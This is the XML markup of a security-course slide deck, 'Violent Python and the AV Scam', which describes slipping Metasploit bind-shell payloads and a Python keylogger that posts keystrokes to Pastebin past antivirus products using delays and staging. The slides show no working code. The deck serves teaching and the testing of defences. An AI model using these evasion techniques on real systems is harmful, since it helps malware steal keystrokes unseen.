            <a:ext cx="5116690" cy="1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Python Keylogger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3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2844800" cy="2223029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google "Python Keylogger"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36333"/>
            <a:ext cx="2844800" cy="3289830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I used this one from 4 years ago</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.41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9" y="599194"/>
            <a:ext cx="5475646" cy="585152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53163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Keystrokes to Pastebin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9-ch1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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="846665" y="1725070"/>
            <a:ext cx="7605889" cy="46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2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Pastebin busted me for making too many pastes in a 24-hour period</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So I wrote my own Pastebin imitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344622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Kaspersky &amp; Avast! LOSE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4 at 11.13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45" y="1715123"/>
            <a:ext cx="6152444" cy="469132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88915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78"/>
            <a:ext cx="8229600" cy="931333"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton WINS!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5-24 at 11.28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55" y="1221171"/>
            <a:ext cx="6166556" cy="541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2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just add a delay...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5-24 at 11.46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19" y="1304749"/>
            <a:ext cx="7613335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2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6-22 at 2.01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6326"/>
            <a:ext cx="8313084" cy="2764561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-06-22 at 2.02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26" y="3355500"/>
            <a:ext cx="5441643" cy="1646391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="p3-ps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9" y="5188482"/>
            <a:ext cx="64389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782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222"/>
            <a:ext cx="8229600" cy="959556"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F-Secure LOSES!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4 at 12.02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417638"/>
            <a:ext cx="6533444" cy="539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3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PRODUCT ANNOUNCEMENT!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65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78"/>
            <a:ext cx="8229600" cy="917222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ultra-Advanced APT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92889"/>
            <a:ext cx="8229600" cy="93327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samsclass.info/evil.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 12.24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11" y="1120422"/>
            <a:ext cx="5537200" cy="36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9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5-24 at 12.28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56" y="633561"/>
            <a:ext cx="6152444" cy="602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5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UNSTOPPABLE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 of these products stop it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>McAfee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nod32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F-Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avast!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft Security Essentials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2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6-06 at 9.45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46" y="705596"/>
            <a:ext cx="52705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649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6-06 at 9.45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28" y="799675"/>
            <a:ext cx="74549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622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illy-f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520"/>
            <a:ext cx="9144000" cy="599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3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4-06-22 at 2.07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25" y="422933"/>
            <a:ext cx="8115300" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="p3-ps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4610"/>
            <a:ext cx="9144000" cy="160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9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06-22 at 2.0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4074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14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6-22 at 2.10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2038411"/>
            <a:ext cx="8521700" cy="394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92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651</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>141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Violent Python</vt:lpstr>
      <vt:lpstr>Bio</vt:lpstr>
      <vt:lpstr>CNIT 124 Advanced Ethical Hacking</vt:lpstr>
      <vt:lpstr>Violent Python</vt:lpstr>
      <vt:lpstr>Violent Python</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Projects</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Antivirus  Ungh!  Good God y'all...  What is it GOOD For?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mikko Hypponen Video</vt:lpstr>
      <vt:lpstr>Metasploit Payloads</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Simple Reverse Shell</vt:lpstr>
      <vt:lpstr>Antivirus Catches It</vt:lpstr>
      <vt:lpstr>Norton v. Shell.exe</vt:lpstr>
      <vt:lpstr>Norton Identifies the Metasploit Packer</vt:lpstr>
      <vt:lpstr>VirusTotal: 37/49 Detections</vt:lpstr>
      <vt:lpstr>How to Become 007</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python v. AV Round 1 shell_bind_tcp</vt:lpstr>
      <vt:lpstr>Export Metasploit Payloads to C</vt:lpstr>
      <vt:lpstr>Use Ctypes Python Library</vt:lpstr>
      <vt:lpstr>Compile it on Windows</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>VirusTotal: 1/50 Detection</vt:lpstr>
      <vt:lpstr>Norton Support</vt:lpstr>
      <vt:lpstr>Norton Wins!</vt:lpstr>
      <vt:lpstr>Kaspersky Wins!</vt:lpstr>
      <vt:lpstr>Python v. AV Round 2 shell_bind_tcp with a delay</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Norton, Avast, &amp; MSE Lose!</vt:lpstr>
      <vt:lpstr>Kaspersky Wins!</vt:lpstr>
      <vt:lpstr>Python v. AV Round 3 shell_bind_tcp in two stages no delay</vt:lpstr>
      <vt:lpstr>Other AV</vt:lpstr>
      <vt:lpstr>Remember Mikko?</vt:lpstr>
      <vt:lpstr>F-Secure Wins!</vt:lpstr>
      <vt:lpstr>AV Challenge</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python v. AV Round 4 shell_bind_tcp with a delay</vt:lpstr>
      <vt:lpstr>INSTRUCTIONS</vt:lpstr>
      <vt:lpstr>INSTRUCTIONS</vt:lpstr>
      <vt:lpstr>Norton Loses</vt:lpstr>
      <vt:lpstr>Kaspersky Wins</vt:lpstr>
      <vt:lpstr>Advanced Malware Protection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python Keylogger</vt:lpstr>
      <vt:lpstr>Google "Python Keylogger"</vt:lpstr>
      <vt:lpstr>Post Keystrokes to Pastebin</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>Kaspersky &amp; Avast! LOSE</vt:lpstr>
      <vt:lpstr>Norton WINS!</vt:lpstr>
      <vt:lpstr>But just add a delay...</vt:lpstr>
      <vt:lpstr>F-Secure LOSES!</vt:lpstr>
      <vt:lpstr>PRODUCT ANNOUNCEMENT!</vt:lpstr>
      <vt:lpstr>Ultra-Advanced APT Tool</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>UNSTOPPABLE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Violent Python and the AV Scam</dc:title>
  <dc:creator>Sam Bowne</dc:creator>
  <cp:lastModifiedBy>Sam Bowne</cp:lastModifiedBy>
  <cp:revision>218</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-05-22T16:10:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-04-18T22:41:07Z</dcterms:modified>
</cp:coreProperties>
</file>